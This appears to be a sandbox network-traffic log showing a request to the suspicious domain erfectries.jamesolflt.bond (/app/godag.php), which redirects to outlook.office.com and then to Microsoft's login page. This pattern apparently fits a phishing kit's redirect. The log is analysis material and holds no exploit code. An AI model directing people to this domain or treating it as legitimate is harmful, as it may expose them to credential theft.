2025-04-02 13:02:37 UTC	449	OUT	GET /app/godag.php HTTP/1.1 Host: erfectries.jamesolflt.bond Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=2ku3e3aufn4jfmga3rcg7k98ut
2025-04-02 13:02:37 UTC	547	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 13:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type Location: https://outlook.office.com Cf-Cache-Status: DYNAMIC CF-RAY: 92a0858aa9b7c331-EWR alt-svc: h3=":443"; ma=86400
2025-04-02 13:02:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:38 UTC	612	OUT	GET /owa/ HTTP/1.1 Host: outlook.office.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: ClientId=27FB4385CA36452B9A7FC392D401AE00; OIDC=1; OpenIdConnect.nonce.v3.Fo5fe8qPZLlBcpr6yzTV4PTHUGymm-3HmcLotv1Le08=638791957494166796.0183df0d-d0c0-4d9a-8337-34682ca3f5bb; X-OWA-RedirectHistory=ArLym14BDPXQn-Zx3Qg
2025-04-02 13:02:38 UTC	10412	IN	HTTP/1.1 302 Content-Length: 783 Content-Type: text/html; charset=utf-8 Location: https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=090ea8c5-553c-4f09-a41e-0c1e6188bfab&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=638791957584460052.12143051-40bd-4ffc-94e1-5fce6ebb2f40&state=DctLFoAgCEBRrNNySFDwsxw1mTZs-zG4b_YCAJzucIE8UEtutXPXqk2kEGm6ObFkUkah-aCYLeyyGdXWLnvOZELB3yu-34g_ request-id: 090ea8c5-553c-4f09-a41e-0c1e6188bfab Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-CalculatedFETarget: PH8PR02CU002.internal.outlook.com X-BackEndHttpStatus: 302 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: RoutingKeyCookie=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.Z2pw-GiiFXoeXDyhJ0Rc5hmHMu-aKt2CXHErzWRgRaE=638791957584460052.12143051-40bd-4ffc-94e1-5fce6ebb2f40; expires=Wed, 02-Apr-2025 14:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.Z2pw-GiiFXoeXDyhJ0Rc5hmHMu-aKt2CXHErzWRgRaE=638791957584460052.12143051-40bd-4ffc-94e1-5fce6ebb2f40; expires=Wed, 02-Apr-2025 14:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 02-Apr-1995 13:02:38 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: X-OWA-RedirectHistory=ArLym14BFLkypeZx3Qg\|ArLym14BDPXQn-Zx3Qg; expires=Wed, 02-Apr-2025 19:04:38 GMT; path=/;SameSite=None; secure; HttpOnly X-CalculatedBETarget: PH7P222MB1076.NAMP222.PROD.OUTLOOK.COM X-BackEndHttpStatus: 302 X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-Content-Type-Options: nosniff X-BeSku: WCS7 X-OWA-DiagnosticsInfo: 3;0;0; X-BackEnd-Begin: 2025-04-02T13:02:38.446 X-BackEnd-End: 2025-04-02T13:02:38.446 X-UA-Compatible: IE=EmulateIE7 X-ResponseOrigin: OwaAppPool X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 302 X-FEEFZInfo: MNZ X-FEServer: PH8PR02CA0048 Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=&FrontEnd=Cafe&DesusertionEndpoint=MNZ&RemoteIP=161.77.13.0&Environment=MT"}],"include_subdomains":true} NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FirstHopCafeEFZ: MNZ X-FEProxyInfo: BL6PEPF00013E0C.NAMP222.PROD.OUTLOOK.COM X-FEServer: BL6PEPF00013E0C Date: Wed, 02 Apr 2025 13:02:38 GMT Connection: close
2025-04-02 13:02:38 UTC	783	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 30 30 30 30 30 30 30 32 2d 30 30 30 30 2d 30 66 66 31 2d 63 65 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 26 61 6d 70 3b 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 6f 75 74 6c 6f 6f 6b 2e 6f 66 66 69 63 65 2e 63 6f 6d 25 32 66 6f 77 61 25 32 66 26 61 6d 70 3b 72 65 73 6f Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&reso